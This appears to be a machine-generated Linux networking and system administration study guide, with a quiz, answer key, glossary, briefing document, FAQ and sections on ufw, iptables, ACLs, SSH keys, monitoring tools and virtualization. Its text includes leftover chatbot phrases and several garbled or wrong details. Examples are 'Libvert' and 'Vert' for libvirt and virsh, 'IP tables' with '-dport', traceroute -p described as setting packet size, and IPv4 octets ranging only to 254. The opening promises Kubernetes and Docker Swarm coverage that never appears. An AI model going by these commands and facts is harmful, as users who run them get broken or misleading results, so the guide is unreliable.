    This comprehensive guide explores essential Linux system administration tasks, focusing on security, resource management, and cloud technologies. It covers network configuration, firewall management using ufw and iptables, and secure communication via SSH and GPG. User authentication methods, including password-based and key-based authentication, are examined. Furthermore, the guide details file system security, including file permissions, Access Control Lists (ACLs), and the use of chroot jails for isolating processes. Disk usage analysis, cleanup procedures, system performance monitoring tools like topfree, and vmstat are explained. Finally, it provides an introduction to virtualization and cloud computing concepts, Docker, and container orchestration using Kubernetes and Docker Swarm.

    Network Fundamentals and Security: A Comprehensive Study Guide

    Study Guide Outline

    I. Basic Networking Concepts * IP Addressing: IPv4 vs IPv6 * Subnets and Subnet Masks: Calculation, Network vs Host Bits * Domain Name System (DNS): Resolution Process, Hierarchy (Root Servers, TLD Servers, Authoritative Servers)

    II. Linux Network Configuration * Interface Configuration: ifconfig (Legacy) vs ip (Modern) * Network Manager Command Line Interface (NMCLI): Connection Management, Wi-Fi Management

    III. Network Troubleshooting * Ping: Testing Reachability, Packet Loss * Traceroute: Path Analysis, Hop Count * Netstat & SS: Monitoring Network Connections, Listening Ports

    IV. Network Security Fundamentals * Firewall Management: Uncomplicated Firewall (UFW), IP Tables * AppArmor: Application Security Policies * Password Management: Best Practices, Multi-Factor Authentication (MFA)

    V. Encryption and Key Management * GPG (GNU Privacy Guard): Public Key Cryptography, Encryption/Decryption, Key Management (Import/Export)

    VI. System Monitoring and Logging * System Logging: Syslog, Authentication Logs, Kernel Logs * Disk Usage Analysis: DF, DU * Process Monitoring: Top, Htop * Memory Monitoring: Free, VMStat

    VII. Virtualization and Cloud Computing * Virtualization Concepts: Virtual Machines (VMs), Hypervisors (Type 1 vs Type 2), KVM * Containerization: Docker, Docker Commands

    VIII. VM/Container Management Tools * Libvert: Vert, Vert-install * Docker: Docker CLI

    Quiz: Short Answer Questions

    1. What is the primary difference between IPv4 and IPv6 addresses? IPv4 uses a 32-bit numerical label while IPv6 uses a 128-bit alphanumeric label. IPv6 was developed to overcome the address limitations of IPv4.
    2. Explain the purpose of a subnet mask. A subnet mask is used to divide an IP address into network and host portions, determining how many addresses are available within a network. It also defines which part of the IP address identifies the network and which part identifies the host.
    3. Describe the steps in the DNS resolution process. The DNS resolution process begins with a query from a client to a DNS resolver, which may recursively query root servers, TLD servers, and authoritative servers until the IP address corresponding to the domain name is found. The resolver then returns the IP address to the client.
    4. What are the key differences between using ifconfig and ip commands in Linux? ifconfig is a legacy tool for network interface configuration while ip is the modern replacement; ifconfig is still in use. ip is part of the IP Route 2 package and offers more comprehensive functionality and features than ifconfig.
    5. How does the ping command help in network troubleshooting? ping tests the reachability of a host by sending ICMP packets and measuring the round trip time for those packets. This helps identify network connectivity issues and packet loss.
    6. What information does the traceroute command provide about a network route? traceroute identifies the path a packet takes to reach a destination, including each hop (router) along the way. It also measures the time it takes to reach each hop, helping pinpoint delays or failures.
    7. What is the role of the Uncomplicated Firewall (UFW) in Linux systems? UFW is a user-friendly interface for managing iptables firewall rules in Linux. It simplifies the process of configuring firewall rules to allow or deny network traffic based on specific criteria.
    8. Explain the purpose of Multi-Factor Authentication (MFA). MFA enhances password-based authentication by requiring users to provide multiple verification factors such as passwords and one-time codes sent to a phone. This reduces the risk of unauthorized access even if the password is stolen.
    9. Describe the difference between Type 1 and Type 2 hypervisors. A Type 1 hypervisor (bare metal) runs directly on the hardware, offering better performance, while a Type 2 hypervisor runs on top of an existing operating system. Type 2 hypervisors tend to be easier to install.
    10. What is the purpose of Docker containers? Docker containers package applications and their dependencies into portable units that can run consistently across different environments. This ensures that the application behaves the same regardless of the host system.

    Answer Key: Short Answer Questions

    1. IPv4 uses a 32-bit numerical label while IPv6 uses a 128-bit alphanumeric label. IPv6 was developed to overcome the address limitations of IPv4.
    2. A subnet mask is used to divide an IP address into network and host portions, determining how many addresses are available within a network. It also defines which part of the IP address identifies the network and which part identifies the host.
    3. The DNS resolution process begins with a query from a client to a DNS resolver, which may recursively query root servers, TLD servers, and authoritative servers until the IP address corresponding to the domain name is found. The resolver then returns the IP address to the client.
    4. ifconfig is a legacy tool for network interface configuration while ip is the modern replacement; ifconfig is still in use. ip is part of the IP Route 2 package and offers more comprehensive functionality and features than ifconfig.
    5. ping tests the reachability of a host by sending ICMP packets and measuring the round trip time for those packets. This helps identify network connectivity issues and packet loss.
    6. traceroute identifies the path a packet takes to reach a destination, including each hop (router) along the way. It also measures the time it takes to reach each hop, helping pinpoint delays or failures.
    7. UFW is a user-friendly interface for managing iptables firewall rules in Linux. It simplifies the process of configuring firewall rules to allow or deny network traffic based on specific criteria.
    8. MFA enhances password-based authentication by requiring users to provide multiple verification factors such as passwords and one-time codes sent to a phone. This reduces the risk of unauthorized access even if the password is stolen.
    9. A Type 1 hypervisor (bare metal) runs directly on the hardware, offering better performance, while a Type 2 hypervisor runs on top of an existing operating system. Type 2 hypervisors tend to be easier to install.
    10. Docker containers package applications and their dependencies into portable units that can run consistently across different environments. This ensures that the application behaves the same regardless of the host system.

    Essay Format Questions

    1. Discuss the evolution of network configuration tools in Linux, comparing and contrasting ifconfig and ip. Explain the advantages of using ip over ifconfig in modern network management.
    2. Explain the significance of the Domain Name System (DNS) in the context of network communication. Describe the hierarchy of DNS servers and the steps involved in resolving a domain name to an IP address. What security vulnerabilities are associated with DNS?
    3. Analyze the role of firewalls in network security and discuss the advantages and disadvantages of using UFW and IP Tables for managing firewall rules. In what scenarios might an administrator prefer one over the other?
    4. Compare and contrast Type 1 and Type 2 hypervisors. Discuss the advantages and disadvantages of each type, providing specific examples of virtualization technologies that fall under each category. In what scenarios would you recommend each type of hypervisor?
    5. Explain the benefits of containerization using Docker. Discuss the key Docker commands and concepts, such as Docker images, containers, and Dockerfiles. How do Docker containers improve application deployment and scalability?

    Glossary of Key Terms

    • IP Address: A unique numerical identifier assigned to each device connected to a network, enabling communication.
    • Subnet Mask: A mechanism for dividing an IP address into network and host portions, defining network size.
    • DNS (Domain Name System): A hierarchical system that translates domain names into IP addresses.
    • Resolver: A DNS server that performs recursive queries to resolve domain names.
    • TLD (Top-Level Domain) Server: DNS servers for top-level domains like .com, .org, and .net.
    • Authoritative DNS Server: A DNS server that holds the definitive answer for a domain’s DNS records.
    • ifconfig: A legacy command-line tool for configuring network interfaces on Linux.
    • ip: A modern command-line tool for configuring network interfaces on Linux, part of the IP Route 2 package.
    • NMCLI (Network Manager Command Line Interface): A command-line tool for managing network connections in Linux.
    • Ping: A network utility used to test the reachability of a host.
    • Traceroute: A network utility used to trace the path a packet takes to a destination.
    • Netstat: A command-line tool for displaying network connections, routing tables, and interface statistics.
    • SS (Socket Statistics): A modern command-line tool that provides similar functionality to netstat.
    • UFW (Uncomplicated Firewall): A user-friendly interface for managing firewall rules in Linux.
    • IP Tables: A powerful firewall utility in Linux for configuring packet filtering rules.
    • AppArmor: A Linux kernel security module that allows administrators to restrict application capabilities.
    • MFA (Multi-Factor Authentication): A security measure that requires users to provide multiple verification factors.
    • GPG (GNU Privacy Guard): A tool for encrypting and decrypting data using public key cryptography.
    • Hypervisor: Software that creates and runs virtual machines (VMs).
    • Virtual Machine (VM): A software-based emulation of a physical computer.
    • Type 1 Hypervisor: A bare-metal hypervisor that runs directly on the hardware.
    • Type 2 Hypervisor: A hosted hypervisor that runs on top of an existing operating system.
    • KVM (Kernel-based Virtual Machine): A type 1 hypervisor integrated into the Linux kernel.
    • Ver: Command line tool that interacts with KVM.
    • VirtualBox: A popular type 2 hypervisor for running virtual machines.
    • Containerization: A virtualization method that isolates applications and their dependencies into portable containers.
    • Docker: A popular containerization platform for building, shipping, and running applications in containers.
    • Image (Docker): An immutable, packaged snapshot of an application and its dependencies.
    • Container (Docker): A running instance of a Docker image.
    • Libvert: A toolkit providing APIs and management tools for virtualization environments.
    • df: Displays disk space usage for file systems.
    • du: Displays disk space usage for files and directories.
    • Top: Displays a dynamic real-time view of running processes.
    • Htop: Displays a dynamic real-time view of running processes with a user-friendly, colorful interface.
    • Free: Displays the amount of free and used memory in the system.
    • Vmstat: Displays information about virtual memory, system processes, and CPU activity.
    • Syslog: A standard protocol for logging system events and messages.
    • Chroot: An operation that changes the apparent root directory for the current running process and their children.
    • ACL (Access Control List): A list of permissions attached to an object. It specifies which users or groups have access to the object and what operations they are allowed to perform.

    Linux System Administration and Networking Fundamentals

    Okay, here’s a briefing document summarizing the key concepts and ideas from the provided text, with quotes as requested.

    Briefing Document: Networking and System Administration Fundamentals

    This document summarizes core concepts and tools related to networking, security, and system administration within a Linux environment. The information is derived from a training series focusing on fundamental principles and practical commands.

    I. Networking Fundamentals

    • IP Addressing: IP addresses are unique identifiers for devices on a network, enabling communication. “IP addresses are unique identifiers assigned to devices that are connected to a network. they allow you communicate with each other uh and are very important for Network management and communication.”
    • IPv4: The original IP addressing scheme, using 32-bit numerical labels. Limited to approximately 4.3 billion unique addresses. Each section can range “from zero and uh go all the way to 254”. The standard notation includes numbers separated by three dots, such as 192.168.1.1.
    • Subnet Masks: Defines the network portion and host portion of an IP address. Example: “192.168.1.1 was a subnet subnet mask of 255 2555 2555 so the first three o octets are exactly the same which means that this portion 1921 1681 this first three the numbers right here represent the network and then the last piece would be the actual host”. A subnet mask of 255.255.255.0 means the first three octets represent the network, and the last octet identifies the host.
    • Reserved Addresses: Two addresses within a subnet are always reserved: the network address (often .0) and the broadcast address (often .255).
    • DNS (Domain Name System): Translates domain names (e.g., google.com) into IP addresses. This process involves a hierarchy of DNS servers.
    • The user’s computer sends a DNS query to a “DNS resolver.” The resolver then contacts root DNS servers.
    • “The resolver will contact one of the root DNS servers and these are at the top of the DNS hierarchy so these are the actuals and the orgs and the Nets.”
    • Root servers direct the query to the appropriate Top-Level Domain (TLD) server (e.g., .com, .org). The TLD server then finds the IP address.
    • “the authoritative server is going to be at this particular location so that gets sent back to the local DNS server”.
    • The DNS resolver receives the IP address and provides it to the user’s computer, loading the website.
    • DHCP (Dynamic Host Configuration Protocol): Automatically assigns IP addresses to devices on a network.

    II. Network Interface Configuration

    • ifconfig (Interface Configuration): A command-line utility used to configure network interfaces on Unix-based systems (Linux, macOS). Allows viewing and assigning IP addresses, controlling interface states (up/down).
    • Despite being “deprecated supposedly,” ifconfig remains in use on some systems. The command ifconfig without arguments lists all network interfaces and their configurations.
    • “The simplest version of the command is to just type if config and press enter and it’ll lists all the network interfaces that are on your system along with all of the current configurations meaning the IP addresses that are assigned to them if there are any network masks or broadcast addresses and everything else that would be appropriate for that particular configuration”
    • ip (IP Route2): The modern replacement for ifconfig. Provides similar functionality for managing network interfaces. IP space a or IP space address displays network interfaces and details. The command ip a will produce a result very simliar to ifconfig
    • nmcli (NetworkManager Command-Line Interface): A command-line tool for managing network connections on Linux.
    • nmcli connection up <interface>/nmcli connection down <interface>: Activates or deactivates a network interface.
    • nmcli device status: Displays the status of network devices (connected, disconnected, unavailable).
    • nmcli device wifi list: Lists available Wi-Fi networks, including SSIDs, signal strength, and security type.
    • nmcli device wifi connect <SSID> password <password>: Connects to a Wi-Fi network.

    III. Network Troubleshooting Tools

    • ping: Tests the reachability of a host (computer or server) by sending ICMP packets. Measures round-trip time.
    • “you basically ping the IP address or you ping the website and you can also measure the round trip time for the messages that are sent to that to just uh establish how strong the connection is or how quick that particular host is uh to respond to you”
    • The -c option specifies the number of packets to send.
    • The -i option sets the interval between packets.
    • The -f option floods the target with packets.
    • traceroute: Tracks the route a packet takes to reach a destination by incrementing the “time to live” (TTL) value. Helps identify delays or failures along the route.
    • The -m option specifies the maximum number of hops.
    • The -p option sets the packet size.
    • netstat (Network Statistics): Displays network-related information, including connections, routing tables, and interface statistics.
    • Options include: -t (TCP ports), -u (UDP ports), -l (listening ports), and -n (numerical addresses).
    • ss (Socket Statistics): A modern alternative to netstat, offering better performance and more detailed output. Part of the IP Route2 suite.
    • Options are very similar to netstat, such as displaying TCP, UDP, and listening ports

    IV. Firewall Management

    • ufw (Uncomplicated Firewall): A user-friendly command-line interface for managing iptables firewall rules.
    • sudo ufw enable: Activates the firewall.
    • sudo ufw disable: Deactivates the firewall.
    • sudo ufw allow <service>: Allows traffic for a specific service (e.g., SSH).
    • sudo ufw deny <port>: Blocks traffic on a specific port.
    • sudo ufw status: Shows the current firewall status and active rules.
    • sudo ufw allow from <IP address> to any port <port>: Allows traffic from a specific IP address to a specific port.
    • sudo ufw logging on/off: Enables or disables firewall logging.
    • sudo ufw allow in: Allows all incoming traffic.
    • sudo ufw deny in: Denies all incoming traffic.
    • sudo ufw allow out: Allows all outgoing traffic.
    • sudo ufw deny out: Denies all outgoing traffic.
    • iptables: A more complex, low-level firewall management tool.
    • Uses chains (INPUT, OUTPUT, FORWARD) to define packet filtering rules.
    • sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: Enables NAT masquerading, hiding internal IP addresses. “it’ll change the source IP address when it gets sent out to the world to whatever the masquerad the disguised IP address would be”.
    • The mangle table allows for packet alteration, such as changing the type of service.
    • sudo iptables -L: Lists the current rules for the filter table.

    V. Security Enhancements

    • Chroot Jails: Creates an isolated environment for a process, limiting its access to the file system.
    • “effectively you’re isolating a subset of the file system and you create what’s known as the chroot jail”.
    • Enhances security by restricting the damage caused by untrusted programs.
    • Useful for testing, development, and system recovery.
    • Steps include creating a directory, populating it with necessary binaries and libraries, and using the chroot command.
    • File Permissions and Ownership: Controls access to files and directories based on user, group, and others.
    • Permissions: Read (r), Write (w), Execute (x). Numerical values: r=4, w=2, x=1.
    • chmod: Command to change file permissions. Can use symbolic notation (e.g., chmod u+rwx file.txt) or numerical notation.
    • chown: Command to change file ownership.
    • Access Control Lists (ACLs): Provides fine-grained control over file and directory permissions, allowing specific access levels for multiple users and groups.
    • “Access Control lists are a way to provide more more fine grained control over file and directory permissions”.
    • setfacl: Sets ACL entries. Options include -m (modify), -x (remove specific entry), -b (remove all entries), and -d (designate directory).
    • getfacl: Views ACL entries.
    • AppArmor: A security module that confines programs to a limited set of resources.
    • “AppArmor is a security module it’s actually installed natively in ubuntu it enhances the security of an application or a set of applications it works by creating these profiles that will confine the action of the application or the group of the applications you’re protecting to that profile”.
    • Modes: Enforce (blocks unauthorized access) and Complain (allows access but logs it).
    • aa-status: Displays the current AppArmor status.
    • aa-enforce: Sets a profile to enforcing mode.
    • aa-complain: Sets a profile to complain mode.
    • Password Security: Strong passwords are crucial. Multi-factor authentication (MFA) enhances password security.

    VI. Encryption

    • GPG (GNU Privacy Guard): A versatile tool for securing files and communications using public and private key pairs.
    • “it’s a very versatile tool for securing files and Communications using public and private key pairs”.
    • Commands include:
    • gpg –gen-key: Generates a new key pair.
    • gpg -e -r <recipient> <filename>: Encrypts a file for a specific recipient.
    • gpg -d <filename.gpg>: Decrypts a file.
    • gpg –import <public_key_file>: Imports a public key into the key ring.
    • gpg –export -a <user_id> > <public_key_file>: Exports a public key to a file.
    • gpg –list-keys: Lists the keys in the key ring.
    • SCP (Secure Copy Protocol): Securely copies files between systems. Uses SSH for encryption.
    • “securely copies files between a local and a remote machine or between two remote machines”
    • scp <source> <destination>: Copies files.

    VII. System Monitoring and Troubleshooting

    • Log Files: Crucial for system administration and troubleshooting. Located in the /var/log directory.
    • syslog (Debian-based): General system log.
    • messages (Red Hat-based): General system log.
    • auth.log: Authentication events.
    • secure (Red Hat-based): Security-related events.
    • dmesg: Kernel-related messages.
    • Use tail -f <logfile> to monitor logs in real-time.
    • Disk Usage Analysis and Cleanup:df: Displays information about available and used disk space. The -h option provides human-readable output.
    • du: Estimates and displays disk space used by files and directories. The -sh option provides a summary in human-readable format.
    • Process Monitoring:top: Displays a dynamic real-time view of running processes. Allows sorting by CPU usage or memory usage.
    • htop: An enhanced version of top with a more user-friendly interface.
    • Memory Management:free: Displays the amount of free and used memory in the system.
    • “provides human readable output which essentially gives you the measurements in what it thinks are the best measurement”.
    • watch -n 1 free -h: Monitors memory usage in real-time.
    • System Statistics:vmstat: Reports virtual memory statistics, including memory usage, CPU performance, and I/O operations.

    VIII. Virtualization and Cloud Computing

    • Virtualization: Enables running multiple virtual machines on a single physical machine.
    • “Virtual machines are basically simulations of physical computers”.
    • Hypervisors: Software or firmware that creates and manages virtual machines.
    • Type 1 (Bare-Metal): Runs directly on the hardware. Examples: VMware ESXi, Microsoft Hyper-V, Xen.
    • Type 2 (Hosted): Runs on top of an existing operating system. Examples: VirtualBox, VMware Workstation.
    • KVM (Kernel-based Virtual Machine): A type 1 hypervisor integrated into the Linux kernel.
    • virsh: Command-line tool for managing KVM virtual machines.
    • virsh start <VM name>: Starts a virtual machine.
    • virsh list –all: Lists all virtual machines.
    • virsh shutdown <VM name>: Shut down a virtual machine.
    • VirtualBox: A popular type 2 hypervisor.
    • “commonly used for testing and deploying environments”.
    • vboxmanage: Command-line interface for managing VirtualBox VMs.
    • vboxmanage startvm <VM name>: Starts a virtual machine.
    • vboxmanage list vms: Lists all virtual machines.
    • vboxmanage controlvm <VM name> poweroff: Powers off a virtual machine.
    • Containers (Docker): Package applications and their dependencies into portable containers.
    • docker: Containerization tool.
    • docker run <image>: Runs a container.
    • docker ps: Lists running containers.
    • docker stop <container_id>: Stops a container.
    • docker rm <container_id>: Removes a container.
    • Cloud Computing: Provides on-demand access to computing resources (servers, storage, databases, etc.) over the internet. Types: IaaS, PaaS, SaaS.
    • “IaaS is one version of what they would provide for you which is access to the infrastructure that you would otherwise maintain if you weren’t using the cloud”.
    • “PaaS would be the service to develop all the platforms”.
    • “SaaS which is software as a service that we’re going to provide this software or an email or anything like that on demand”.

    I hope this is helpful! Let me know if you’d like me to elaborate on any of these points.

    Networking Fundamentals and Security: FAQ

    FAQ on Networking Fundamentals and Security

    1. What is an IP address, and why is it important?

    An IP (Internet Protocol) address is a unique numerical identifier assigned to every device connected to a network. It enables devices to communicate with each other and is crucial for network management and communication. IPv4, the original version, uses a 32-bit numerical label format (e.g., 192.168.1.1), while IPv6 was developed to address the limitations of IPv4’s address space.

    2. What is a subnet mask, and how does it relate to IP addressing?

    A subnet mask is used to divide an IP address into network and host portions. For example, a subnet mask of 255.255.255.0 indicates that the first three octets of the IP address represent the network, while the last octet identifies the host within that network. Different subnet masks allow for varying numbers of hosts within a network. Two addresses are reserved in each subnet for the network address (usually the first address) and the broadcast address (usually the last address).

    3. What is DNS, and how does it work to resolve domain names to IP addresses?

    DNS (Domain Name System) is a hierarchical system that translates human-readable domain names (like google.com) into IP addresses that computers use to communicate. When you type a domain name into your browser, your computer sends a query to a DNS resolver, which may then contact root DNS servers, top-level domain (TLD) servers (like .com or .org), and authoritative DNS servers to find the corresponding IP address. This process, although complex, happens very quickly in the background.

    4. What are ifconfig and ip, and how are they used to manage network interfaces?

    ifconfig (interface configuration) is a command-line utility used to configure network interfaces on Unix-based operating systems. It allows you to view interface configurations, assign IP addresses, and control the state of interfaces. The ip command, part of the iproute2 package, is intended as a modern replacement for ifconfig, offering similar functionalities with a different command syntax. Examples of using the ip command are ip a or ip addr.

    5. How can nmcli be used to manage network connections in Linux?

    nmcli (NetworkManager Command Line Interface) provides a powerful command-line interface for managing network connections on Linux systems. It allows you to view and modify connections, assign static IP addresses, control connection states (up/down), and manage Wi-Fi networks. For instance, you can use nmcli device wifi list to see available Wi-Fi networks and nmcli connection up <connection_name> to activate a connection.

    6. How do the ping and traceroute commands help in troubleshooting network connectivity issues?

    • ping tests the reachability of a host by sending ICMP packets and measuring the round-trip time. It can help determine if a host is online and how reliable the connection is.
    • traceroute tracks the route packets take to reach a destination, identifying the intermediate routers and delays along the path. This helps pinpoint where connectivity issues or delays occur.

    7. What are firewalls, and how do tools like ufw and iptables contribute to network security?

    Firewalls act as a barrier between a network and the outside world, controlling incoming and outgoing traffic based on configured rules. * ufw (Uncomplicated Firewall) is a user-friendly front-end for managing iptables rules, making it easier to set up basic firewall configurations. Examples include sudo ufw allow SSH and sudo ufw deny 80. * iptables is a more complex command-line tool that provides direct control over the Linux kernel’s packet filtering capabilities. It allows for highly customized firewall rules.

    8. What is a chroot jail, and how does it enhance system security?

    A chroot jail is an isolated environment created by changing the root directory for a process and its children. This limits the access of that process to a specific subset of the file system, enhancing security by preventing compromised programs from accessing or modifying files outside the jail. It’s useful for testing software in a controlled environment or repairing a system from a rescue environment.

    Network Security: UFW, IP Tables, SELinux, and Best Practices

    Network security is crucial, requiring firewalls to act as barriers between internal and external networks by monitoring and controlling traffic based on established rules. Important tools for network security include Uncomplicated Firewall (UFW) and IP tables.

    Uncomplicated Firewall (UFW)

    • It is a simple but powerful firewall with an easy syntax.
    • To activate, use the command sudo ufw enable.
    • Traffic can be allowed or denied by specifying incoming or outgoing along with the port. For example, sudo ufw allow in port 22 allows incoming traffic on port 22 (SSH), while sudo ufw deny out port 80 denies outgoing HTTP traffic on port 80.
    • To check the status and active rules, use ufw status.
    • Traffic can be allowed from specific IP addresses using ufw allow from [IP address] to any port 22.

    IP Tables

    • It is a more complex tool that allows detailed control over the network and enables creation of complex rules for packet filtering and network address translation.
    • To view current rules, use sudo IP tables -L. The default table is the filter table, displaying input, forward, and output chains.
    • To add a rule, the command is IP tables -A INPUT -p tcp -dport 22 -j ACCEPT to allow TCP traffic on destination port 22. To block traffic, use IP tables -A INPUT -p tcp -dport 80 -j DROP.
    • To save rules, use iptables-save > /etc/iptables/rules.v4. To restore rules, use iptables-restore < /etc/iptables/rules.v4.

    SELinux (Security-Enhanced Linux) is a security module in the kernel that provides access control policies. SELinux defines rules for processes and users accessing resources, enforcing strict policies. Its modes of operation include enforcing (blocks violations), permissive (logs violations), and disabled. Common commands include SE status to view the status and setenforce 1 to enable enforcing mode, or setenforce 0 for permissive mode.

    App Armor is another security mechanism that uses application-specific profiles for access control. Commands include aa-status to get the status of App Armor, and aa-enforce to enforce a profile for a specific application.

    Additional points on network security:

    • Changing the default SSH port (Port 22) can reduce the risk of automated brute force attacks. This is done in the sshd configuration file.
    • Disabling root login forces attackers to log in as standard users and escalate privileges. This is configured in the sshd configuration file by setting permit root login no.
    • Limiting SSH users involves whitelisting specific users who can log in via SSH by using the allow users parameter. The SSH service must be restarted to apply configuration changes.
    • GPG (GNU Privacy Guard) is used for encrypting data. It uses asymmetric encryption with public and private key pairs.
    • Secure file transfer can be achieved with SCP (secure file copy) or SFTP (secure file transfer protocol). SCP securely copies files between hosts.
    • Analyzing authentication logs can reveal unauthorized access attempts. Key log files include auth.log and secure log.
    • rsync can be used to back up data, including syncing over SSH for secure transfers.

    Linux File Permissions and Access Control

    File permissions are essential for system security, dictating who can access and modify files and directories. Understanding and managing these permissions ensures that sensitive data remains protected and that only authorized users can make changes.

    Levels of File Permissions

    • Categories: Permissions are assigned based on three categories: the owner (a specific user), the group, and others.
    • Permissions: Each category has three types of permissions: read (r), write (w), and execute (x). Read permission allows users to view the file’s contents, write permission allows modification, and execute permission allows running a file or entering a directory.
    • Numerical Values: Each permission has a numerical value: read is 4, write is 2, and execute is 1. These values are combined to represent the total permissions for each category. For example, read and execute (4+1) would be 5.

    Commands to Change Permissions

    • chmod (Change Mode): This command is used to change the permissions of a file or directory. It can be used in two ways:
    • Symbolic Mode: Uses symbols like r, w, and x to add or remove permissions. For example, chmod u+rwx,g+rx,o+rx file.txt gives the owner read, write, and execute permissions, and the group and others read and execute permissions.
    • Numerical Mode: Uses numerical values to set permissions. For example, chmod 755 file.txt gives the owner read, write, and execute permissions (7), and the group and others read and execute permissions (5 each).
    • chown (Change Owner): This command changes the ownership of a file or directory. For example, chown user:group file.txt changes the owner to “user” and the group to “group”.
    • chgrp (Change Group): This command changes the group ownership of a file or directory. For example, chgrp group file.txt changes the group owner to “group”.

    Access Control Lists (ACLs)

    • ACLs provide a more fine-grained control over file and directory permissions, allowing definition of permissions for multiple users and groups on a single file or directory.
    • Entries: Each ACL entry specifies permissions for a user or group, consisting of the type (user or group), an identifier (username or group name), and the permissions.
    • Types of ACLs:User ACL: Specifies permissions for a specific user.
    • Group ACL: Specifies permissions for a specific group.
    • Mask ACL: Defines the maximum effective permissions for users and groups other than the owner.
    • Default ACL: Specifies the default permissions inherited by new files and directories created within a directory.
    • Commands:setfacl (Set File ACL): Sets the ACL for a file or directory. For example, setfacl -m u:user:rwx file.txt adds read, write, and execute permissions for the user “user” on “file.txt”.
    • getfacl (Get File ACL): Displays the ACL entries for a specified file, showing all users and groups with their defined permissions.

    Removing ACL Entries

    • -x option: Removes a specific user or group entry from the ACL. For example, setfacl -x u:user file.txt removes the ACL entry for the user “user”.
    • -b option: Removes all ACL entries from a file or directory. For directories, the -d option is used in conjunction with -b to remove default ACL entries.

    By understanding and utilizing these commands, file permissions and access control lists (ACLs) can be effectively managed to maintain a secure and well-organized Linux system.

    User Authentication Methods: Password, MFA, and Public Key

    User authentication involves methods to verify the identity of a user trying to access a system or application. Common methods include password-based authentication, multi-factor authentication (MFA), and public key authentication.

    Password-Based Authentication

    • This is the default method where users enter a username and password to gain access.
    • To improve security, password-based authentication can be enhanced with Multi-Factor Authentication (MFA).

    Multi-Factor Authentication (MFA)

    • MFA adds an extra layer of security by requiring users to provide multiple verification factors.
    • This often includes sending a code to a user’s phone or email, or using biometric methods like fingerprint or face scans.
    • MFA reduces the risk of unauthorized access, even if an attacker obtains the user’s password.

    Public Key Authentication

    • This method uses a key pair consisting of a private key and a public key.
    • The private key is kept secret by the user, while the public key is placed on the server.
    • Public key authentication is more secure than password-based authentication and is not subject to brute force attacks.
    • It allows for automated, passwordless logins, which are useful for scripts and applications.
    • To generate a key pair, the command SSH key gen is used.
    • After running SSH key gen, a file path to save the key is required, and a passphrase can be set for additional security.

    Key Transfer and Authentication

    • To enable passwordless access, the public key must be transferred to the authorized Keys file on the server.
    • The user must authenticate themselves with a password at some point before transferring the key.
    • Without initial password authentication, the system will not trust the user to transfer the key.

    System Monitoring with top, htop, free, and vmstat

    System monitoring is crucial for maintaining system performance and troubleshooting issues. Key tools for this purpose include top, htop, free, and vmstat.

    **top**

    • Provides a dynamic, real-time view of running processes and their resource usage.
    • Displays CPU usage, memory usage, and process IDs (PIDs).
    • To sort by CPU usage, press P while top is running.
    • To sort by memory usage, press M.
    • To quit, press Q.

    **htop**

    • It is a user-friendly alternative to top with enhanced features and an intuitive interface.
    • Offers interactive process management and color-coded output.
    • Can use function keys (F1-F12) or keyboard shortcuts for navigation.
    • F3 key can be used to search for processes.
    • F9 key can be used to kill a process.
    • To quit, press Q or F10.

    **free**

    • Displays information about the system’s memory usage, including physical memory and swap space.
    • The command free -h formats the output in a human-readable format (KB, MB, GB).
    • Shows the total, used, free, shared, buffer, and cached memory.
    • To monitor memory usage in real-time, use watch -n 1 free -h.
    • Detailed memory information can be obtained from the /proc/meminfo file.

    **vmstat**

    • Virtual memory statistics (vmstat) monitors system performance, providing statistics on CPU, memory, and I/O operations.
    • The basic command is vmstat 1 5, where the first number is the update interval in seconds, and the second is the number of iterations.
    • Key fields in the output include processes (runnable and blocked), memory (swap, free, buffer, cache), swap (in and out), I/O (blocks received and sent), system (interrupts and context switches), and CPU usage (user, system, idle, wait, stolen).
    • The st field refers to the CPU steal time, which is the percentage of time a virtual CPU is waiting for resources because the hypervisor is allocating resources to another VM.
    • Running vmstat 1 updates data every second until interrupted, while vmstat provides a single snapshot.

    These tools provide different perspectives and can be used together to get a comprehensive understanding of system performance.

    Virtualization, Cloud Computing, and Containerization Technologies Overview

    Virtualization is a technology that allows multiple virtual machines to run on a single physical machine, improving resource use and providing isolated environments. Key concepts include virtual machines and hypervisors.

    Virtual Machines (VMs)

    • VMs are software-based simulations of physical computers, each running its own operating system and applications independently of others on the same physical host.
    • VMs offer isolation, so a failure in one VM does not affect others.

    Hypervisors

    • A hypervisor is software or firmware that creates, manages, and deploys virtual machines, allocating resources to each.
    • There are two types of hypervisors:
    • Type 1 (Bare Metal): Runs directly on the physical hardware without needing a host operating system, common in enterprise environments for high performance. Examples include VMware ESXi, Microsoft Hyper-V, and Xen.
    • Type 2 (Hosted): Runs on top of an existing operating system. It uses the host’s resources and is suited for desktop virtualization and smaller environments. Examples include VirtualBox, VMware Workstation, and Parallels Desktop.

    Advantages of Virtualization:

    • Resource Efficiency and Scalability: Virtualization allows efficient use of physical resources and easy scaling up or down based on needs.
    • Isolation and Security: Each VM operates independently, isolating it from other VMs on the network. A compromised VM does not affect the rest of the network.
    • Flexibility and Agility: Enables easy testing, deployment, and development in isolated environments. New virtual machines can be quickly deployed.
    • Disaster Recovery: Simplifies backups and recovery by storing entire virtualized environments that can be easily accessed and restored, especially with redundancies in place.

    Kernel-Based Virtual Machine (KVM)

    • KVM is a type 1 hypervisor integrated into the Linux kernel, transforming the OS into a virtualization host.
    • It leverages Linux features for memory management, process scheduling, and I/O handling.
    • KVM supports hardware-assisted virtualization via Intel VT or AMD-V technology.
    • The virsh command-line tool manages KVM-based VMs. Common virsh commands include virsh start to start a VM, virsh list to list running VMs, and virsh shutdown to shut down a VM.

    VirtualBox

    • VirtualBox is a type 2 hypervisor developed by Oracle, compatible with various operating systems like Linux, Windows, and macOS.
    • It offers an easy-to-use GUI and command-line interface for managing VMs.
    • Key features include snapshot functionality for backups and guest additions to enhance performance.
    • VBoxManage is the command-line interface for VirtualBox, with commands like VBoxManage startvm to start a VM, VBoxManage list vms to list VMs, and VBoxManage controlvm to control VMs.

    Cloud Computing Cloud computing provides on-demand access to computing resources over the Internet, including servers, storage, databases, and software. It allows users to provision and manage these resources easily.

    Cloud Service Models:

    • Infrastructure as a Service (IaaS): Provides virtualized hardware resources like virtual machines, storage, and networks. Users deploy and manage operating systems, applications, and development environments. Examples include AWS EC2, Microsoft Azure Virtual Machines, and Google Compute Engine.
    • Platform as a Service (PaaS): Offers a development and deployment environment in the cloud, including tools and services to build, test, deploy, and manage applications without managing the underlying infrastructure. Examples include AWS Elastic Beanstalk, Google App Engine, and Microsoft Azure App Service.
